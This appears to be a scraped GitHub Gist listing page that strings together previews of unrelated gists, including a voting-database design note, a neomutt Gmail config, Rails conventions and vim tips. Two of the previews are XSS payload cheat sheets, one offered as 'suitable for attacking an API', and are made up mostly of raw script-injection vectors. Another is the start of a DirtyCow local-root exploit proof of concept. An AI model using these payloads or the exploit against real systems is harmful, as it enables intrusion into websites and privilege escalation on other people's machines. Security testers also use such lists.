🇵🇸
Palestine will be free ✌🏽

Abdulwahaab Ahmed 🍉 Abdulwahaab710
Anonymous Verifiable Database

This document outlines solutions to building the database for a voting system with the following features:

  • Anonymous means that it is not possible to associate a vote back to a single citizen, but a citizen can log back in and review that their ballot was cast correctly.
  • Personally Verifiable means that we can automatically detect that their vote was counted as they cast it; this is something that is not possible in the current voting system.
  • Publicly Verifiable means that we can automatically go through the database, independently count the votes, and ensure they have not been altered.
@berzerk0
berzerk0 / CTFWRITE-ZorZ@Vulnhub.md
Last active August 5, 2023 13:35
A Few WebApp File Upload Vulnerabilities Explained - CTF Writeup: Zorz

This gist has been DEPRECATED.

Updates will be reflected on GITPAGE VERSIONS ONLY

A Few WebApp File Upload Vulnerabilities Explained - CTF Writeup: Zorz

20 November 2017

This "CTF" is more of a vulnerability sandbox than a true Capture the Flag challenge. However, it is a great way to explore some WebApp Upload vulnerabilities.

The VulnHub description says:

@VladimirPal
VladimirPal / neomuttrc
Last active March 30, 2024 11:59
Minimal neomutt config for gmail imap
set imap_user="mail.vpal@gmail.com"
set imap_pass=`/usr/bin/security find-generic-password -w -a 'mail.vpal@gmail.com' -s 'Gmail'`
set folder=imaps://imap.gmail.com/
set spoolfile=+INBOX
set record="+[Gmail]/Sent Mail"
set postponed="+[Gmail]/Drafts"
# https://www.neomutt.org/guide/reference search sleep_time for additional info
set sleep_time=0 # be faster
@HelioCampos
HelioCampos / database_migration_best_practices.md
Created September 28, 2017 14:00
Database migration best practices for Rails

Database migration best practices for Rails

Never ever change data on schema changes! [1]

Use rake tasks to change the data! [1]

This decouples a deployment from completed migrations. It gives us control of the data manipulation process by encapsulating it in one place. You need to remember to:

  1. Run it in one of the ways below:
     a. Add this rake task to the deployment script or;
@kurobeats
kurobeats / xss_vectors.txt
Last active July 15, 2024 23:05
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@rverton
rverton / cowroot.c
Created October 21, 2016 14:06
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@martijnvermaat
martijnvermaat / nixos.md
Last active July 13, 2024 09:08
Installation of NixOS with encrypted root
@v0d1ch
v0d1ch / vimgist
Last active September 29, 2023 12:48
vim replace newline with comma
1,$s/\n/,/g #replace newline with comma
%norm A* #append * to every line
bufdo! %s/FIND/REPLACE/g # search all buffers
@iangreenleaf
iangreenleaf / gist:b206d09c587e8fc6399e
Last active June 20, 2024 02:39
Rails naming conventions

Rails naming conventions

General Ruby conventions

Class names are CamelCase.

Methods and variables are snake_case.

Methods with a ? suffix will return a boolean.

@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>